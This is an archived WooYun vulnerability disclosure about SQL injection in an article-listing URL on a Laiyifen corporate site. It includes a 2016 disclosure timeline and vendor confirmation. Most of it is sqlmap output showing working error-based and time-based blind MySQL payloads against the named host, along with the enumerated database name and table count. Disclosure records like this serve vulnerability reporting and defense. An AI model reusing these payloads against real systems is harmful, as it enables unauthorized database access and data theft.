WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online reader ------------ http://drop.zone.ci/
2016-03-08: Details sent to the vendor, awaiting the vendor's handling
2016-03-08: Vendor has confirmed; details disclosed to the vendor only
2016-03-18: Details disclosed to core white hats and experts in related fields
2016-03-28: Details disclosed to regular white hats
2016-04-07: Details disclosed to intern white hats
2016-04-22: Details disclosed to the public
http://group.laiyifen.com/index.php/article-gonggao-lists-1*-2.html
Requires --level 5
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: http://group.laiyifen.com:80/index.php/article-gonggao-lists-1" AND (SELECT 7127 FROM(SELECT COUNT(*),CONCAT(0x71716a7871,(SELECT (ELT(7127=7127,1))),0x7162766a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND "WRsK"="WRsK-2.html

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: http://group.laiyifen.com:80/index.php/article-gonggao-lists-1" AND SLEEP(5) AND "Bnty"="Bnty-2.html
---
web application technology: Nginx, PHP 5.4.38
back-end DBMS: MySQL 5.0
Database: groupdb
[149 tables]
Severity: High
Vulnerability Rank: 19
Confirmed at: 2016-03-08 14:14
Thank you for your support of Laiyifen; we will work hard to do better!
None yet